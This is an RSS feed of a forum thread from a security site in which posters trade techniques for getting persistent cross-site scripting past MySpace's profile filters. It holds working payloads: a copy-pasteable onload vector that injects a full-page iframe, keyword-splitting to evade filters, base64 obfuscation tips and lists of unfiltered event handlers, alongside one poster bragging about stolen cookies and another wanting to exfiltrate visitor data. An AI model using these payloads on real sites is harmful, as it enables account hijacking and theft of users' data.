<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Myspace</title>
        <description>In relation to the XSS flaw V-wall found in myspace, (5th DEC), I have been trying to implement the appendchild into this which maluc did one the XSS fragementation exploit a while ago. 

The original exploit was




I would like any advice on how to use the appendchild without an alert, or with an alert if not possible.



I had that, but it doesnt work, so any (useful) replies would be great. Thankyou.

If you would like to reply abuse, just PM me rather than on here as i would like to actually know the answer rather than your opinion on my post.

Thanks in advance.</description>
        <link>http://sla.ckers.org/forum/read.php?3,3798,3798#msg-3798</link>
        <lastBuildDate>Fri, 24 May 2013 23:00:53 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,18794#msg-18794</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,18794#msg-18794</link>
            <description><![CDATA[I don't think that is possible. All XSS has been patched from profile.myspace.com]]></description>
            <dc:creator>johnsonsmith1</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 03 Jan 2008 23:23:52 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,18660#msg-18660</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,18660#msg-18660</link>
            <description><![CDATA[this is my post ;) so i know bout the hole.<br />
the question for me is now, how can i use this to get something <br />
from my visitor, without having him to click on a link?<br />
some held would be nice.<br />
<br />
last day in 2007]]></description>
            <dc:creator>GaSmo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 30 Dec 2007 17:21:51 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,18656#msg-18656</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,18656#msg-18656</link>
            <description><![CDATA[This just popped up today: http://sla.ckers.org/forum/read.php?3,18640]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 30 Dec 2007 14:58:51 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,18553#msg-18553</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,18553#msg-18553</link>
            <description><![CDATA[hmmm, damn.<br />
<br />
so there is no way to run js in myspace?<br />
i don't want to steal cookies or phis user accounts,<br />
i only want to send a myspace jsvariable to an external server.<br />
<br />
any other ideas? some hints? anything?]]></description>
            <dc:creator>GaSmo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 21 Dec 2007 13:12:44 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,18550#msg-18550</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,18550#msg-18550</link>
            <description><![CDATA[Those are from January, bro.<br />
<blockquote class="bbcode"><div><small>Quote<br/></small><strong></strong><br/>Re: Myspace new<br />
Posted by: rsnake (IP Logged)<br />
<b>Date: January 15, 2007 01:12AM</b></div></blockquote>]]></description>
            <dc:creator>kefka</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 21 Dec 2007 12:30:14 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,18549#msg-18549</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,18549#msg-18549</link>
            <description><![CDATA[yeah - that are the vectors i found too.<br />
But nowow i'm still not able to get it executed.<br />
<br />
I tryed to use onmediaerror, <br />
but myspace makes :<br />
&lt;?IMPORT namespace=&quot;t&quot; implementation=&quot;&amp;#035;default&amp;#035;time2&quot;&gt;<br />
out of:<br />
&lt;?IMPORT namespace=&quot;t&quot; implementation=&quot;#default#time2&quot;&gt;<br />
<br />
octal and hex encoded strings are filtert too, so anyone can give me<br />
hint how to usw it please?]]></description>
            <dc:creator>GaSmo</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 21 Dec 2007 11:13:43 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5261#msg-5261</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5261#msg-5261</link>
            <description><![CDATA[Remind me not to be your friend, Spikeman.  ;)]]></description>
            <dc:creator>rsnake</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 14 Jan 2007 19:12:54 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5249#msg-5249</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5249#msg-5249</link>
            <description><![CDATA[Personally, I think it's funny how when they put in the new filters they don't make everyone refilter their page. As far as I know, they've only done this once.. as a result I have about 6 months worth of my friends cookies. :P]]></description>
            <dc:creator>Spikeman</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 14 Jan 2007 16:36:45 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5197#msg-5197</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5197#msg-5197</link>
            <description><![CDATA[Cool stuff.<br />
<br />
Ok so this:<br />
&lt;body onload&lt;script=alert('xss');&gt;<br />
<br />
what if I make:<br />
<br />
&lt;body onload&lt;script&gt;=alert('xss');&gt;<br />
<br />
it will render like this?<br />
<br />
&lt;body onload..&gt;=alert('xss');&gt; <br />
<br />
so only &quot;&lt;script&quot; is filtered out? if so, that is bad practice and indeed need do-&gt;while loops ^^]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 13 Jan 2007 08:17:13 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5159#msg-5159</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5159#msg-5159</link>
            <description><![CDATA[digi7al64 Wrote:<br />
-------------------------------------------------------<br />
&gt; @Jungsonn<br />
&gt; Until yesterday i believe myspace allowed event<br />
&gt; elements in submitted code along as the following<br />
&gt; character was not an = sign. However due to our<br />
&gt; persistant xss attacks they have now added filters<br />
&gt; (contained in a while loop) to check for them and<br />
&gt; replace them altogether (regardless of where they<br />
&gt; are). <br />
&gt; <br />
&gt; Before we where tricking their filter by forming<br />
&gt; strings such as<br />
&gt; <br />
&gt; <br />
&gt; <br />
&gt; &quot;<br />
&gt; <br />
&gt; The reason this was so successfull was that it<br />
&gt; seems there filters only ever checked for<br />
&gt; &quot;onload=&quot; which wasn't being presented. hence it<br />
&gt; passed the filter.<br />
&gt; <br />
&gt; But in all fairness their filtering system is a<br />
&gt; joke and once ^6 is patched i might release a<br />
&gt; couple more vectors that show again how bad their<br />
&gt; filter system is.<br />
<br />
I can't wait for the one you're working on that will hopefully work with IE!!!  Thank you for all of your hard work.  ;)]]></description>
            <dc:creator>OrbityBaby</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 12 Jan 2007 12:41:10 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5139#msg-5139</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5139#msg-5139</link>
            <description><![CDATA[@Jungsonn<br />
Until yesterday i believe myspace allowed event elements in submitted code along as the following character was not an = sign. However due to our persistant xss attacks they have now added filters (contained in a while loop) to check for them and replace them altogether (regardless of where they are). <br />
<br />
Before we where tricking their filter by forming strings such as<br />
<br />
&lt;body onload&lt;script=alert('xss');&gt;<br />
<br />
&quot;&lt;script&quot; of course being disallowed was then replaced with &quot;..&quot; which resulted in the following code<br />
<br />
&lt;body onload..=alert('xss');&gt;<br />
<br />
The reason this was so successfull was that it seems there filters only ever checked for &quot;onload=&quot; which wasn't being presented. hence it passed the filter.<br />
<br />
But in all fairness their filtering system is a joke and once ^6 is patched i might release a couple more vectors that show again how bad their filter system is.]]></description>
            <dc:creator>digi7al64</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 12 Jan 2007 03:28:58 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5135#msg-5135</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5135#msg-5135</link>
            <description><![CDATA[@digi7al64<br />
<br />
I'm a little oblivious on myspace stuff, so I got a question:<br />
<br />
If you mess around with these vectors above:<br />
<br />
onabort<br />
onblur<br />
onchange<br />
onclick<br />
ondblclick<br />
<br />
are these strictly blocked? like match -&gt; &quot;onclick&quot;<br />
<br />
and is there a way something like:<br />
<br />
on &lt;some stuff&gt; click + onclick  ?]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 12 Jan 2007 02:18:25 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5134#msg-5134</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5134#msg-5134</link>
            <description><![CDATA[system: very clever.. honestly javascript is way too versatile for it's own good _-_<br />
<br />
but i guess it's only trying to follow in the footsteps of it's slutty step-sister HTML.<br />
<br />
broken code should not be fixed automatically at run time =.=''<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Fri, 12 Jan 2007 02:17:23 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5112#msg-5112</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5112#msg-5112</link>
            <description><![CDATA[kuza55 and spikeman<br />
<br />
As of today, myspace have reimplemented the event filtering regex<br />
<br />
onabort<br />
onblur<br />
onchange<br />
onclick<br />
ondblclick<br />
onerror<br />
onfocus<br />
onkeydown<br />
onkeypress<br />
onkeyup<br />
onload <br />
nowonmousedown<br />
onmousemove <br />
onmouseout  <br />
onmouseover <br />
onmouseup<br />
onreset <br />
onresize <br />
onselect<br />
onsubmit<br />
onunload <br />
<br />
now all revert to ..<br />
<br />
Also it would appear that they have implemented a semi looping process to look for these elements.]]></description>
            <dc:creator>digi7al64</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 11 Jan 2007 18:40:52 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5111#msg-5111</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5111#msg-5111</link>
            <description><![CDATA[In reply to: maluc<br />
who posted [snippet]: &quot;They do already filter &quot;eval(&quot; which is good..&quot;<br />
on: December 17, 2006 12:27PM<br />
<br />
I found some ways to get around javascript function filters. I'm surprised I've never seen this anywhere already. Simple bit of logic.<br />
<br />
http://xssxss.1111mb.com/xss/xss.html<br />
<br />
view-source to get an explanation ;)<br />
<br />
I suppose you can also use things like javascript:%61lert('xss'); but that would be URL-only from what I gather. Like, you couldn't have inline script access and use %61lert('xss') I don't think... [without &quot;unescape()&quot; and probably &quot;eval()&quot;]]]></description>
            <dc:creator>SystemOfAHack</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Thu, 11 Jan 2007 18:24:23 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,5005#msg-5005</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,5005#msg-5005</link>
            <description><![CDATA[Yeah I remember them doing something like that.. they don't anymore? That seemed like a much more effective way.]]></description>
            <dc:creator>Spikeman</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Wed, 10 Jan 2007 03:05:35 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4389#msg-4389</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4389#msg-4389</link>
            <description><![CDATA[Of all those the the onExit one looks the most useful to me.<br />
<br />
But I could have sworn that MySpace used a regex to filter out event handlers, because I remember playing around with odd event handlers, and then giving up and trying things like onTest= to see if they worked, and having them get filtered out as well.<br />
<br />
Obviously they aren't now, but can anyone remember if they did before, or if I was just imagining things?]]></description>
            <dc:creator>kuza55</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 23 Dec 2006 18:11:11 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4377#msg-4377</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4377#msg-4377</link>
            <description><![CDATA[in myspaces profile, the following event handlers are not filtered (taken from the <a href="http://ha.ckers.org/xss.html#XSS_Event_handlers" rel="nofollow" >XSS cheat sheet</a>):<br />
<pre class="bbcode">
1.	FSCommand() (attacker can use this when executed from within an embedded Flash object)
14.	onBegin() (the onbegin event fires immediately when the element's timeline begins)
23.	onCut() (user needs to copy something or it can be exploited using the execCommand(&quot;Cut&quot;) command)
24.	onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
25.	onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.	onDataSetComplete() (fires to indicate that all data is available from the data source object)
29.	onDrag() (requires that the user drags an object)
36.	onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like &lt;P STYLE=&quot;behavior:url('#default#time2')&quot; onEnd=&quot;alert('XSS')&quot;&gt;)
39.	onExit() (someone clicks on a link or presses the back button)
52.	onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
53.	onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)</pre>
<br />
see what you can come up with that executes..<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 23 Dec 2006 15:41:24 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4371#msg-4371</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4371#msg-4371</link>
            <description><![CDATA[yes, the mozbinding has been discussed frequently here, and it's quite useful. You should note that it works for firefox only, though.<br />
<br />
And that's a good find, they filter it out in the profile page but not for blogs.. guess we should retry all the previous holes on the blogs too - since they go through less filtering.<br />
<br />
other places it work(s|ed): http://sla.ckers.org/forum/search.php?3,search=binding,page=1,match_type=ALL,match_dates=365,match_forum=ALL<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 23 Dec 2006 12:25:58 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4368#msg-4368</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4368#msg-4368</link>
            <description><![CDATA[Hi all,<br />
the following blog entry of mine could be interesting for some of you. I think this method will work at many different places but I didn't try it yet.<br />
<br />
You'll find the blog entry here:<br />
http://www.disenchant.ch/blog/32/32<br />
<br />
Regards,<br />
Disenchant]]></description>
            <dc:creator>Disenchant</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 23 Dec 2006 08:14:12 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4217#msg-4217</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4217#msg-4217</link>
            <description><![CDATA[Didn't Tom post a blog or something about updating Quicktime when it tells you?<br />
I was just messing around with &lt;embed src=&quot;http://neo-force.com/XSS.wav&quot;&gt;&lt;/embed&gt;<br />
(Taken from http://www.criticalsecurity.net/index.php?showtopic=17562&amp;hl=myspace)<br />
<br />
And it turns it into:<br />
&lt;embed allowScriptAccess=&quot;never&quot; allowNetworking=&quot;internal&quot; enableJSURL=&quot;false&quot; enableHREF=&quot;false&quot; saveEmbedTags=&quot;true&quot; src=&quot;http://neo-force.com/XSS.wav&quot; &gt;&lt;/embed&gt;<br />
<br />
But it still works in IE and Firefox with no update message. I guess I'll update Quicktime and see what happens.<br />
<br />
[Edit]<br />
I upgraded to 7.1.3 from http://www.apple.com/quicktime/download/win.html and it still works fine in IE and Firefox.]]></description>
            <dc:creator>Ghozt</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 19 Dec 2006 01:13:03 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4181#msg-4181</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4181#msg-4181</link>
            <description><![CDATA[great tip ^^.. i was adding that same encoding to a PoC of mine but the fact that they have one built-in makes it much easier for the polymorphing side of the code<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 18 Dec 2006 15:05:56 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4178#msg-4178</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4178#msg-4178</link>
            <description><![CDATA[One tip about Myspace, use their built-in decode64 function and just use a settimeout on your code, and encode it in base64.]]></description>
            <dc:creator>Spikeman</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 18 Dec 2006 14:53:53 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4149#msg-4149</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4149#msg-4149</link>
            <description><![CDATA[to save yourself extra questions.. here's a copy-pasteable version. switched to asdf since it has an easy to discern black background:<br />
<br />
&lt;body onload..Ø=&quot;x=document.createElement('if'+'rame');x.src='http://asdf.com/';y=x.style;<br />
y.position='absolute';y.top='0';y.left='0';y.border='0';y.height=document.height;y.width=document.width;document.body.appendChild(x);&quot;&gt;<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 Dec 2006 14:38:24 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4148#msg-4148</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4148#msg-4148</link>
            <description><![CDATA[-.- just add a style=&quot;position:absolute&quot; to the iframe<br />
<br />
and their goal is to stop a direct &lt;iframe&gt; tag .. once you've already got javascript running it's just far too versatile to prevent other obfuscating. They do already filter &quot;eval(&quot; which is good.. and if they filtered &quot;createElement(&quot; and &quot;appendChild(&quot; too .. it would solve alot of their problems.. i think :x<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 Dec 2006 14:27:28 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4147#msg-4147</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4147#msg-4147</link>
            <description><![CDATA[To get borderless and scrolless windows, the following code will do it:<br />
<br />
Page = &quot;http://domain/page-to-display.html&quot;<br />
document.body.innerHTML = '&lt;iframe src=&quot;'+Page+'&quot;border=0 width=&quot;100%&quot; height=&quot;100%&quot; FRAMEBORDER=0&gt;&lt;/iframe&gt;';<br />
<br />
<br />
Took me a while to do as I was trying out quite a few different ways, then I just took a look at the official IFRAME args &amp; voila, no frames]]></description>
            <dc:creator>Tribute</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 Dec 2006 14:26:42 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4146#msg-4146</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4146#msg-4146</link>
            <description><![CDATA[Yeah thanks, should have looked through it abit more really. Guess i was just concerned at changing the form values the first time i skimmed through the code. This works and borderless but it gets appended to the bottom of the page, so to see it i have to scroll down... this doesn't seem a convincing way. Im using FF 1.5.0.8, ill have a look through anyway, iv been very busy lately not really had chance to.<br />
<br />
Also i was very shocked to see that they filter the word Iframe and convert it to [iframe], which can be solved simply by putting if'+'rame are they serious? This is pretty bad.]]></description>
            <dc:creator>eyeced</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 Dec 2006 13:43:13 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4124#msg-4124</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4124#msg-4124</link>
            <description><![CDATA[no actually, it's not easy to find these holes.. myspace does a guud job of preventing XSS. They are in a much tougher than normal situation though, by choosing to allow their users to input HTML code.<br />
<br />
If i had to list every major dynamic website that has adequate XSS protection, it'd be a list of only 4. Google, Microsoft, Facebook, and Myspace. Now that's kinda sad when you think how many major sites don't make that cut (maybe i'm too picky .-.)<br />
<br />
Although nobody's perfect - all four of those have had working XSS holes in the past week. Anyway, the fact that myspace allows a lot more opportunities for persistent XSS, makes it desirable to field test javascript worms. (not to mention the largest victim base)<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 Dec 2006 01:31:20 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4122#msg-4122</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4122#msg-4122</link>
            <description><![CDATA[I never been at myspace.com, but it seems if I read all the XSS on here, it would be a fun place. <br />
<br />
Is it getting harder on myspace? or just a cat and mouse game?]]></description>
            <dc:creator>jungsonn</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sun, 17 Dec 2006 00:45:49 -0600</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,3798,4121#msg-4121</guid>
            <title>Re: Myspace</title>
            <link>http://sla.ckers.org/forum/read.php?3,3798,4121#msg-4121</link>
            <description><![CDATA[.-. everyone has a sob story.. but email me -  <br />
<br />
arserbin3  is the addy<br />
yahoo.fr   is the host<br />
<br />
-maluc]]></description>
            <dc:creator>maluc</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Sat, 16 Dec 2006 22:41:22 -0600</pubDate>
        </item>
    </channel>
</rss>
